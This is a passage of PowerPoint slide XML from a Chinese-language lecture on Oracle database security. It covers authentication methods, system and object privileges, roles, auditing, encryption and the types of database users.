              <a:solidFill>
                <a:srgbClr val="010101"/>
              </a:solidFill>
              <a:latin typeface="宋体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="4653280" indent="0" algn="just">
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" spc="335" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="010101"/>
                </a:solidFill>
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>权限管理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" spc="335" dirty="0">
              <a:solidFill>
                <a:srgbClr val="010101"/>
              </a:solidFill>
              <a:latin typeface="宋体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="4653280" indent="0" algn="just">
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" spc="335" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="010101"/>
                </a:solidFill>
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>角色管理</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" spc="335" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="010101"/>
                </a:solidFill>
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>表空间设置和配额</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:latin typeface="宋体"/>
              <a:cs typeface="宋体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" spc="350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="010101"/>
                </a:solidFill>
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>用户资源限制 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" spc="409" dirty="0">
              <a:solidFill>
                <a:srgbClr val="010101"/>
              </a:solidFill>
              <a:latin typeface="宋体"/>
              <a:cs typeface="宋体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" spc="409" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="010101"/>
                </a:solidFill>
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>数据库审计</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" spc="409" dirty="0">
              <a:solidFill>
                <a:srgbClr val="010101"/>
              </a:solidFill>
              <a:latin typeface="宋体"/>
              <a:cs typeface="宋体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>数据库安全性含义</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:latin typeface="宋体"/>
              <a:cs typeface="宋体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" spc="204" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="010101"/>
                </a:solidFill>
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>防止</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" spc="290" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>非</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" spc="335" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" spc="360" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" spc="175" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" spc="204" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="010101"/>
                </a:solidFill>
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" spc="390" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="010101"/>
                </a:solidFill>
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" spc="220" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="010101"/>
                </a:solidFill>
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" spc="254" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="010101"/>
                </a:solidFill>
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" spc="385" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="010101"/>
                </a:solidFill>
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" spc="300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="010101"/>
                </a:solidFill>
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>访问</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" spc="300" dirty="0">
              <a:solidFill>
                <a:srgbClr val="010101"/>
              </a:solidFill>
              <a:latin typeface="宋体"/>
              <a:cs typeface="宋体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" spc="360" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="010101"/>
                </a:solidFill>
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>防止用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" spc="150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="010101"/>
                </a:solidFill>
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" spc="290" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="010101"/>
                </a:solidFill>
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" spc="290" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>非</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" spc="275" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" spc="215" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>操</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" spc="335" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>作</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="宋体"/>
              <a:cs typeface="宋体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
              <a:latin typeface="宋体"/>
              <a:cs typeface="宋体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
              <a:latin typeface="宋体"/>
              <a:cs typeface="宋体"/>
            </a:endParaRP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数据库安全性</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2064687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gn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>一个用户要对某一数据库进行操作时，必须满足以下三个条件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:latin typeface="宋体"/>
              <a:cs typeface="宋体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>登录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>oracle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>服务器时必须通过身份验证；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:latin typeface="宋体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>必须是该数据库的用户或是某以数据库角色的成员</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:latin typeface="宋体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>必须有执行该操作的权限</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:latin typeface="宋体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>oracle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>系统中，为了实现这种安全性，采取用户、角色和概要文件等管理策略</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:latin typeface="宋体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>数据库验证： 数据库验证是指用户的帐户、 口令及身份鉴定都由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>Oracle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>数据库执行的 验证方式。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>外部验证： 用户的帐户由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>Oracle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>数据库管 理，但口令管理和身份鉴定由外部服务完成。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>企业验证： 用户的帐户由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>Oracle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>数据库管理，口令管理和用户鉴定由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>Oracle  Security Service (OSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>）完成</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用户管理与身份验证</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1908869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gn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>用户如果要执行某项操作，必须具备相应的权限，即用户权限。用户权限可分两类：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:latin typeface="宋体"/>
              <a:cs typeface="宋体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>系统权限： 是指对数据库系统及数据结构的 操作权，例如创建／删除用户、表、同义词、 索引等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:latin typeface="宋体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>对象权限：是指用户对数据的操作权，如查、更新、插入、删除、完整性约束等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:latin typeface="宋体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>用户权限可以被授权和收回。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:latin typeface="宋体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>角色是一组用户权限和角色的集合</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:latin typeface="宋体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>使用角色可以一次把一组权限授予用户，或者从用户处回收</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:latin typeface="宋体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>角色分为系统预定角色和用户自定义角色两类</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:latin typeface="宋体"/>
            </a:endParaRP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用户权限和角色</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="172592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zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>网络传输的安全机制</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>对关键数据进行了加密，即使攻击者通过了防火墙和服务器上的操作系统到达了数据库，还要对数据进行破解。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>有两种对数据加密的方式：数据加密和备份加密。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>数据加密：数据加密执行所有的数据库级别的加密操作，消除了应用程序开发人员创建定制的代码来加密和解密数据的过程。数据在写到磁盘时进行加密，从磁盘读的时候解密。使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>来管理加密和解密，可以保护数据库中的业务数据而不必对现有应用程序做任何更改。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>备份加密：对备份进行加密可以防止数据泄露和被篡改。</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安全机制介绍</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="680067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marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>数据库用户可分为以下五类</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:latin typeface="宋体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>数据库管理员</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:latin typeface="宋体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>数据库管理员用于安装和升级</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>oracle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>服务器和应用工具；对系统存储空间的管理；对数据库结构的管理；控制、监视用户对数据库的访问；调优数据库；备份及恢复。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:latin typeface="宋体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>安全管理员</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:latin typeface="宋体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
